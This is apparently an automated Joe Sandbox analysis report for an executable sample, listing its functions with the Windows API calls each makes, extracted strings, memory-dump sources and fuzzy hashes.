Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 87897ebf25943853770af3740af2dda80e88082d561c695aacbeb4a868519e4a
Instruction ID: 5581fa10e1d0fea24e30c87d8c11182321e603713d414dd9eae44563c1fb5c47
Opcode Fuzzy Hash: 87897ebf25943853770af3740af2dda80e88082d561c695aacbeb4a868519e4a
Instruction Fuzzy Hash: 2C51A1717043118BCF58DF68949456EBBEABBD8340F24492EF446C7B60DB31DE4A8B92

Function 00403500 Relevance: 1.6, APIs: 1, Instructions: 134COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040364B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 3ef8fa902811f37a227f982be95726e24abe72f9fc45eb8cf27ef255a7508ab6
Instruction ID: a7515e18ae772762c3a573cf8702573f3b008f407889140e989f148f1847eb7b
Opcode Fuzzy Hash: 3ef8fa902811f37a227f982be95726e24abe72f9fc45eb8cf27ef255a7508ab6
Instruction Fuzzy Hash: B441913560C3829FC304CF2998905AABFE5AF9D204F488A7EF4C997352D635DA06CB56

Function 02501D10 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be51751cb9ca36183b631a60a5333251ddc728976d34e2def2fc68e12fabd508
Instruction ID: 343311653caa87ddbb622622dc7e54fdba1d2942fb36ad567a3a745d102b4483
Opcode Fuzzy Hash: be51751cb9ca36183b631a60a5333251ddc728976d34e2def2fc68e12fabd508
Instruction Fuzzy Hash: D041E975A00509EFDB04CF44C8D4BAABBB2FB88314F24C559E81A5F395C775EA82CB85

Function 00693670 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE ref: 00693737

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: cf960775b3aef38a6a46afdf7edf5ec350b0689ce8c68cd8d7ce7bb3fc63e983
Instruction ID: d489e04bd59a4ad49d91976b207de901b433a8021a3035020684a1f234cd9cad
Opcode Fuzzy Hash: cf960775b3aef38a6a46afdf7edf5ec350b0689ce8c68cd8d7ce7bb3fc63e983
Instruction Fuzzy Hash: 0B119D70B002205BDFA4AFB49D15A6B36EF9FC8B10B00442FB509CBB84EE35DE068795

Function 00696CD0 Relevance: 1.5, APIs: 1, Instructions: 45libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNELBASE(00000000,?,33A6B453,00696F05,?,33A6B453,006968AC), ref: 00696D00

Memory Dump Source

Source File: 00000000.00000002.1491969270.0000000000691000.00000020.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1491953214.0000000000690000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1491988034.000000000069D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_ExeFile (360).jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d49aa3240eda99f36b4bfef2bd9409600b18cf683ed41e75ccf6d6196c218723
Instruction ID: 51bbaacb24697c68c38d0d473f9b757dc02b0322af780764bbfe44491bfe2a40
Opcode Fuzzy Hash: d49aa3240eda99f36b4bfef2bd9409600b18cf683ed41e75ccf6d6196c218723
Instruction Fuzzy Hash: E4014B307003608BCF94AF799854A2B36EFAFC8650B00843FB519CBF91EA34DE064B94

Function 0041A3A8 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041A3ED

Part of subcall function 0041E57A: InitializeCriticalSection.KERNEL32(00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5B7
Part of subcall function 0041E57A: EnterCriticalSection.KERNEL32(?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379,?,00403512,0000E0DF), ref: 0041E5D2

Part of subcall function 0041E5DB: LeaveCriticalSection.KERNEL32(?,0041A82B,00000009,?,0041E5C6,00000000,?,?,?,0041A3BD,00000009,?,?,0041A38C,000000E0,0041A379), ref: 0041E5E8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitializeLeave
String ID:
API String ID: 495028619-0
Opcode ID: c05c04bd59d3803bd1287509f1f7e75638a363287035ac2b14446576c0e81156
Instruction ID: 145397013719e2512da1c4e1b179e9380ae4a496153f906815a63b1f9c4bcaec
Opcode Fuzzy Hash: c05c04bd59d3803bd1287509f1f7e75638a363287035ac2b14446576c0e81156
Instruction Fuzzy Hash: 4FE0E532942A24A2C52222557C01BDA26016B40764F2A0136FD64BB2D2E6E89CD1529E

Function 025027B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 025027D9

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: fe40e864eca65a694f9126ce69058f9ebad8eadc1633022f0feb99c376142628
Instruction ID: 1fe3ad23ff14198f083bde7b287afffd0784e2eedb27a360ad3d1f5e9e236dbf
Opcode Fuzzy Hash: fe40e864eca65a694f9126ce69058f9ebad8eadc1633022f0feb99c376142628
Instruction Fuzzy Hash: EDD05EB4D40208FFE700EFA4DD9AF6DBBB4EB04301F108164E9046B280E6702A04CF56

Function 00405F10 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00001024,00000000,?,00000000), ref: 00405F27

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4b8555cac2b4701d16259b226aa7860f847c7af235e94040c1487d145025083a
Instruction ID: 97f0358e55fd8811207f3f425efd3db66fac2ddb67eb715aac3d8e5dfe8b603e
Opcode Fuzzy Hash: 4b8555cac2b4701d16259b226aa7860f847c7af235e94040c1487d145025083a
Instruction Fuzzy Hash: 86D0C972298381ABE7148B60DC06FA672E4B780706F20491DB25ACA1C0D7B4A0088615

Function 0041CA76 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,0041E3EB,00000001,00000074,?,0041AAD5), ref: 0041CACB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4fdd37806deaf47ad60713ea8517e46518f7d5e46e2c558df3ae7828686b548a
Instruction ID: 4af1f3a97e2bb122d1646f5ee527feb1cf230dee4ff4452717d48875362b94b5
Opcode Fuzzy Hash: 4fdd37806deaf47ad60713ea8517e46518f7d5e46e2c558df3ae7828686b548a
Instruction Fuzzy Hash: 5B01F936A8061466D623E2652C81BDF22059F907F5F190137FD54763D6EBB88CC0819E

Function 02501820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 0250182F

Memory Dump Source

Source File: 00000000.00000002.1492413243.0000000002501000.00000020.00001000.00020000.00000000.sdmp, Offset: 02501000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2501000_ExeFile (360).jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 31c8fdebef7ae37b809fcd6edff654908a1dd0030166f7bb340d3360f583ce63
Instruction ID: 80c1f9cdf1eb425d072aadbf0fdf9fc8632684dafefeadbd530707af1b3b049b
Opcode Fuzzy Hash: 31c8fdebef7ae37b809fcd6edff654908a1dd0030166f7bb340d3360f583ce63
Instruction Fuzzy Hash: A2C04C7A55420CBBCB04DF98EC94DAB37ADBB8C610B048548BA1D87204D630F9109BA4

Non-executed Functions

Function 0042DD8A Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343windowkeyboardCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042DD8F
GetKeyState.USER32(00000001), ref: 0042DDDC
GetKeyState.USER32(00000002), ref: 0042DDE9
GetKeyState.USER32(00000004), ref: 0042DDF6
GetParent.USER32(?), ref: 0042DE17
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042DEF1
SendMessageA.USER32(?,00000408,00000000,?), ref: 0042DF35
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 0042DF4D
ScreenToClient.USER32(?,?), ref: 0042DF69
GetCursorPos.USER32(?), ref: 0042DFC0
SendMessageA.USER32(?,00000412,00000000,?), ref: 0042DFDE
SendMessageA.USER32(?,00000404,00000000,00000028), ref: 0042E040
SendMessageA.USER32(?,00000401,00000001,00000000), ref: 0042E063
SendMessageA.USER32(?,00000411,00000001,00000028), ref: 0042E07F
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 0042E092
SendMessageA.USER32(?,00000405,00000000,000000D8), ref: 0042E0BE
SendMessageA.USER32(?,00000401,00000000,00000000), ref: 0042E10C
GetParent.USER32(?), ref: 0042E13D

Strings

(, xrefs: 0042DF1C
@, xrefs: 0042E046
(, xrefs: 0042DF84

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$State$Parent$ClientCursorH_prologScreenWindow
String ID: ($($@
API String ID: 986702660-2846432479
Opcode ID: 54e6fa5028bff5a94b0eec3a641fc1fea1031f1b2f7d6f4f729fd492d7941791
Instruction ID: b3f43dc500f1eb1a64711de5fb37e1513003e3ae0a8a14f4f08239c73bde8342
Opcode Fuzzy Hash: 54e6fa5028bff5a94b0eec3a641fc1fea1031f1b2f7d6f4f729fd492d7941791
Instruction Fuzzy Hash: C1C1C371F003249BDF249F95EC89BAEBB71AF04300F54403BE915BA2A1DB789D51CB59

Function 00429530 Relevance: 31.8, APIs: 17, Strings: 1, Instructions: 298COMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 00429575
CallWindowProcA.USER32(00000000), ref: 00429597

Part of subcall function 00428280: CallWindowProcA.USER32(00000000,?,?,?,?), ref: 004282A6
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282BE
Part of subcall function 00428280: RemovePropA.USER32(?,00000000), ref: 004282CA

Strings

#32770, xrefs: 00429746

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Prop$CallProcRemoveWindow
String ID: #32770
API String ID: 2276450057-463685578
Opcode ID: d80b185a1ebed9d449154cd72c2ed08a842db24b5fd080b14bec936d813b7bde
Instruction ID: 62b57b2b2e25d3019fe2e79646a7b2469c5bfa36fedba8f44aec85a2799959bc
Opcode Fuzzy Hash: d80b185a1ebed9d449154cd72c2ed08a842db24b5fd080b14bec936d813b7bde
Instruction Fuzzy Hash: 3981FB3270231477D610AB11FC44FAF779CEB86765F84042BFA4583252E72A9D4586BE

Function 004240CA Relevance: 26.7, Strings: 21, Instructions: 417COMMON

Download Yara Rule

Strings

9, xrefs: 0042418B
+, xrefs: 004242BF
9, xrefs: 00424139
1, xrefs: 00424342
-, xrefs: 004241A1
0, xrefs: 00424369
0, xrefs: 004241A6
+, xrefs: 0042419C
9, xrefs: 004241DF
0, xrefs: 00424338
9, xrefs: 0042434B
0, xrefs: 004241F4
C, xrefs: 004241AB
1, xrefs: 0042430F
9, xrefs: 00424317
c, xrefs: 004241B9
9, xrefs: 0042435B
e, xrefs: 004241C2
-, xrefs: 004242C8
0, xrefs: 0042426B
E, xrefs: 004241B4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID:
String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
API String ID: 0-1157002505
Opcode ID: a1a04403ad19b2c6bb1397ae86026f074c1f937fb57652b70dfd97bdd049256a
Instruction ID: 041efa8560062db182f39eb3ca62f07eb567e5967152908c80323c4be7d3b17e
Opcode Fuzzy Hash: a1a04403ad19b2c6bb1397ae86026f074c1f937fb57652b70dfd97bdd049256a
Instruction Fuzzy Hash: 1EE1D030B44239DEEB25DF94E8057FE7BB1FB94344FA40067E841A6281D77C8992CB5A

Function 0040BDF0 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 283windowCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,OldMenuProc), ref: 0040BE16
GetClientRect.USER32(?,?), ref: 0040BF6D
CreateCompatibleDC.GDI32(?), ref: 0040BFA9
CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040BFD3
SendMessageA.USER32(?,00000014,?,00000000), ref: 0040C025
SendMessageA.USER32(?,00000318,?,?), ref: 0040C03B
BitBlt.GDI32(?,00000002,?,?,?,?,00000000,00000000,00CC0020), ref: 0040C079
CallWindowProcA.USER32(?,?,?,?,?), ref: 0040C157

Strings

F, xrefs: 0040BEB2
eE, xrefs: 0040BFE3, 0040BFF1
OldMenuProc, xrefs: 0040BE10

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CompatibleCreateMessageSend$BitmapCallClientProcPropRectWindow
String ID: F$OldMenuProc$eE
API String ID: 1878915148-1318601188
Opcode ID: 3c65330db12feaa07cf53ca5c5a69538b06c594fc93e746c9ba596b6ff9ed08d
Instruction ID: a9e4f92b1ecb595a81d35699ea0e74cd6b3e961d83d87e140b0bdfe8a4130eff
Opcode Fuzzy Hash: 3c65330db12feaa07cf53ca5c5a69538b06c594fc93e746c9ba596b6ff9ed08d
Instruction Fuzzy Hash: 31A14B71204341EFD304DF64C884A6BBBE9EB89704F10463EF94597391DB78D945CB9A

Function 00428D80 Relevance: 19.7, APIs: 13, Instructions: 220windowCOMMON

Download Yara Rule

APIs

CallWindowProcA.USER32(00000000,00000000,?,?,?), ref: 00428DBA
DefWindowProcA.USER32(00000000,?,?,?), ref: 00428DCD
IsIconic.USER32(00000000), ref: 00428DEF
SendMessageA.USER32(00000000,000011EF,00000000,00000001), ref: 00428E1C
GetWindowLongA.USER32(00000000,000000F0), ref: 00428E2B
GetWindowDC.USER32(00000000), ref: 00428E6C
GetWindowRect.USER32(00000000,?), ref: 00428E7A
InflateRect.USER32(?,000000FF,000000FF), ref: 00428EBD
InflateRect.USER32(?,000000FF,000000FF), ref: 00428EE0
SelectObject.GDI32(00000000,00000000), ref: 00428EEE
OffsetRect.USER32(?,?,00000000), ref: 00428F44

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Rect$InflateProc$CallIconicLongMessageObjectOffsetSelectSend
String ID:
API String ID: 2215177122-0
Opcode ID: c7d0c4fa816cf4e1bd1a71f208d1cea1c0a321e1b27ebf95feba27303426b5c1
Instruction ID: a8d8a03a9831e0c9a4092ab09d1ab4f743916551a1cbdcbf9f193bb554a9467e
Opcode Fuzzy Hash: c7d0c4fa816cf4e1bd1a71f208d1cea1c0a321e1b27ebf95feba27303426b5c1
Instruction Fuzzy Hash: D4816971608301AFC300CF68EC85E6BB7E4FB89718F444A2DF98997291E775E905CB56

Function 00442D1A Relevance: 16.2, APIs: 5, Strings: 4, Instructions: 485windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00442D1F

Part of subcall function 0042C86A: __EH_prolog.LIBCMT ref: 0042C86F

Part of subcall function 0042F253: InterlockedDecrement.KERNEL32(-000000F4), ref: 0042F267

Part of subcall function 0042C7EE: __EH_prolog.LIBCMT ref: 0042C7F3

Part of subcall function 0042F38C: InterlockedIncrement.KERNEL32(-000000F4), ref: 0042F3CF

IsIconic.USER32(?), ref: 00442F71
SetForegroundWindow.USER32(?), ref: 00442F92
SendMessageA.USER32(?,00000111,0000E108,00000000), ref: 00443277
PostMessageA.USER32(?,00000010,00000000,00000000), ref: 004432B9

Strings

[printto(", xrefs: 00442E2A
[print(", xrefs: 00442DC6
",", xrefs: 00442FE5, 00442FEA, 004430B0, 00443176
[open(", xrefs: 00442D5F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prolog$InterlockedMessage$DecrementForegroundIconicIncrementPostSendWindow
String ID: ","$[open("$[print("$[printto("
API String ID: 3989956096-3790869113
Opcode ID: 6f7776122492451db2c567f255a9a885cf0bfec5d84ba6d65051b7236e58989c
Instruction ID: 64942d7620a2b2da7ff7cb95020b13df5947714811dce84b0ddd286181d0dcce
Opcode Fuzzy Hash: 6f7776122492451db2c567f255a9a885cf0bfec5d84ba6d65051b7236e58989c
Instruction Fuzzy Hash: CB122D31A00109DFDB04EFA5D985FDE7BB4AF15348F80816EF80597292DB7C9A49CB94

Function 0041203E Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(version.dll,76F90AE0,00000000,00000000,?,?,00411EB9,?,?,?), ref: 0041204A
GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 00412065
GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 00412072
GetProcAddress.KERNEL32(?,VerQueryValueA), ref: 00412081
FreeLibrary.KERNEL32(?,?,?,00411EB9,?,?,?), ref: 00412099

Strings

GetFileVersionInfoA, xrefs: 0041206A
version.dll, xrefs: 00412045
VerQueryValueA, xrefs: 00412077
GetFileVersionInfoSizeA, xrefs: 0041205F

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: GetFileVersionInfoA$GetFileVersionInfoSizeA$VerQueryValueA$version.dll
API String ID: 2449869053-783122509
Opcode ID: a62aab86fc1936960e38da45f28fce40c3cc2023ffb4ce54ef0c80b4d2ec115d
Instruction ID: 48863e17d8e43458d7ca3fafa8f8409454e1cd139d733b04f1df92f564837e40
Opcode Fuzzy Hash: a62aab86fc1936960e38da45f28fce40c3cc2023ffb4ce54ef0c80b4d2ec115d
Instruction Fuzzy Hash: 0B017871610319AFCB105FA9CD84A9A7BF8EB5C340B200166AA09D2291E6F89D50CB69

Function 00405E30 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 60windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,000000FF,00405D41), ref: 00405E49
FormatMessageA.KERNEL32 ref: 00405E77
MessageBoxA.USER32(00000000,?,Error,00000040), ref: 00405E8F
LocalFree.KERNEL32(?), ref: 00405E9A
MessageBoxA.USER32(00000000,00001300,Error,00000040), ref: 00405EE3

Strings

Error, xrefs: 00405E87, 00405EDB
Error message 0x%lx not found, xrefs: 00405EBF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Message$ErrorFormatFreeLastLocal
String ID: Error$Error message 0x%lx not found
API String ID: 2195691534-2345237297
Opcode ID: 47da86882231ce3929fd8cd46a9b7cd759af50d096109be38824e23b4878a8b1
Instruction ID: 2137b85fc6046dbddf904bfa159757db173a7142f0f20741024737ebfdf33506
Opcode Fuzzy Hash: 47da86882231ce3929fd8cd46a9b7cd759af50d096109be38824e23b4878a8b1
Instruction Fuzzy Hash: 5511B174244701BBD214DF04DC46F5B77A4FB84B52F50462DF94DA62D0DBB8E4048B6E

